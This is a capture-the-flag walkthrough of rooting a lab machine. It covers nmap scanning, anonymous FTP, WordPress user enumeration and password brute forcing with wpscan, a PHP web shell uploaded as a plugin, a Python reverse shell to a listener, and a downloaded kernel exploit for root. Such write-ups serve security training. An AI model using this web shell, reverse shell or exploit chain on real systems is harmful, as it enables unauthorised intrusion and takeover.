We always start with an nmap scan…..
Nmap -sC -p- -vv -sV -oA nmap <Target-IP>
# Nmap 7.91 scan initiated Fri May 21 07:09:49 2021 as: nmap -sC -p- -vv -sV -oA nmap 172.16.139.169 Nmap scan report for Red.Initech (172.16.139.169) Host is up, received syn-ack (0.00052s latency). Scanned at 2021-05-21 07:09:50 EDT for 147s Not shown: 65523 filtered ports Reason: 65523 no-responses PORT STATE SERVICE REASON VERSION 20/tcp closed ftp-data conn-refused 21/tcp open ftp syn-ack vsftpd 2.0.8 or later | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: PASV failed: 550 Permission denied. | ftp-syst: | STAT: | FTP server status: | Connected to 172.16.139.1 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDc/xrBbi5hixT2B19dQilbbrCaRllRyNhtJcOzE8x0BM1ow9I80RcU7DtajyqiXXEwHRavQdO+/cHZMyOiMFZG59OCuIouLRNoVO58C91gzDgDZ1fKH6BDg+FaSz+iYZbHg2lzaMPbRje6oqNamPR4QGISNUpxZeAsQTLIiPcRlb5agwurovTd3p0SXe0GknFhZwHHvAZWa2J6lHE2b9K5IsSsDzX2WHQ4vPb+1DzDHV0RTRVUGviFvUX1X5tVFvVZy0TTFc0minD75CYClxLrgc+wFLPcAmE2C030ER/Z+9umbhuhCnLkLN87hlzDSRDPwUjWr+sNA3+7vc/xuZul | 256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNQB5n5kAZPIyHb9lVx1aU0fyOXMPUblpmB8DRjnP8tVIafLIWh54wmTFVd3nCMr1n5IRWiFeX1weTBDSjjz0IY= | 256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ9wvrF4tkFMApswOmWKpTymFjkaiIoie4QD0RWOYnny 53/tcp open domain syn-ack dnsmasq 2.75 | dns-nsid: |_ bind.version: dnsmasq-2.75 80/tcp open http syn-ack PHP cli server 5.5 or later | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: 404 Not Found 123/tcp closed ntp conn-refused 137/tcp closed netbios-ns conn-refused 138/tcp closed netbios-dgm conn-refused 139/tcp open netbios-ssn syn-ack Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP) 666/tcp open tcpwrapped syn-ack 3306/tcp open mysql syn-ack MySQL 5.7.12-0ubuntu1 | mysql-info: | Protocol: 10 | Version: 5.7.12-0ubuntu1 | Thread ID: 10 | Capabilities flags: 63487 | Some Capabilities: ConnectWithDatabase, Speaks41ProtocolOld, IgnoreSigpipes, SupportsTransactions, SupportsCompression, FoundRows, InteractiveClient, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, Speaks41ProtocolNew, ODBCClient, IgnoreSpaceBeforeParenthesis, Support41Auth, LongColumnFlag, LongPassword, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments | Status: Autocommit | Salt: ;(Hpd*V1)FcO<?\x08 N\x08\x0F\x1D |_ Auth Plugin Name: mysql_native_password 12380/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: -4h20m01s, deviation: 34m38s, median: -4h00m02s | nbstat: NetBIOS name: RED, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | Names: | RED<00> Flags: <unique><active> | RED<03> Flags: <unique><active> | RED<20> Flags: <unique><active> | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | WORKGROUP<00> Flags: <group><active> | WORKGROUP<1d> Flags: <unique><active> | WORKGROUP<1e> Flags: <group><active> | Statistics: | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 60380/tcp): CLEAN (Timeout) | Check 2 (port 41878/tcp): CLEAN (Timeout) | Check 3 (port 42246/udp): CLEAN (Failed to receive data) | Check 4 (port 26053/udp): CLEAN (Failed to receive data) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.9-Ubuntu) | Computer name: red | NetBIOS computer name: RED\x00 | Domain name: \x00 | FQDN: red |_ System time: 2021-05-21T08:11:45+01:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-05-21T07:11:46 |_ start_date: N/A Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri May 21 07:12:17 2021 -- 1 IP address (1 host up) scanned in 148.25 seconds
Having access to FTP with anonymous credentials interesting let try checking it found some note in the FTPserver not that helpful to me because i try brute forcing the FTP with the new username i got but no luck.
Now let checking port 80 now but got 404 not found strange now let go back to the nmap scan output.
Found out we still have a web server running on a different port
12380 now let check it out to confirm it .
Now let run Nikto on it ahhhh SSL is active cool.
Now let try opening the page again with SSL
Cool Nikto also show we have the robots.txt page with some directory in it let confirm it .
We move lol cool checking
admin112233 directory no luck but lesson learn and checking
blogblog boom a wordpress CMS.
Going through it saw a user
John Smith probably the admin of the blog cool also found the name in the note i saw on the FTP server ok let enumerate more with
wpscan --url https://172.16.139.169:12380/blogblog/ --enumerate u --disable-tls-checks we need to disable the SSL for
wpscan to work so got some few users with
wpscan now let try to brute force with the user
john and the passwordlist
wpscan --url https://172.16.139.169:12380/blogblog/ --usernames john --passwords /usr/share/wordlists/rockyou.txt --disable-tls-checks
In no time we got the password now let log in.
Now getting reverse shell using the plugin page click on add new plugin/upload plugin .
<?php system ($_GET['cmd']) ?> in a PHP file like rev.php time to upload it .
Now let click on
install now but seems we need to add our FTP credentials before we can upload it easy we know it
anonymous with both username and password.
Now going back to our
wpscan seems we have access to the uploads page for wordpress mean we can see anything we upload
Going through the uploads page we can see the file we upload .
Now time to get command execution
https://172.16.139.169:12380/blogblog/wp-content/uploads/rev.php?cmd=id boom we have command execution .
Now getting the reverse shell let start an ncat listener
nc -nvlp 1337 we be using python reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' .
Now let execute the reverse shell .
https://172.16.139.169:12380/blogblog/wp-content/uploads/rev.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.4",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We have shell let spawn a TTY shell using
python -c 'import pty; pty.spawn ("/bin/bash")' .
Going through the users folder nothing that stand out so i check for kernal version to see if it vulnerable.
I decided to deploy
linux-exploit-suggester.sh onto the target to be sure.
Lot of exploit but the only work that work for me is the double-fdput exploit .
- wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
- uzip 39772.zip
- tar -xf exploit.tar
- chmod +x compile.sh
Now running our compile exploit to get root shell .
And we are root .
Box rooted hope you have fun because i do .
Greeting From Muzec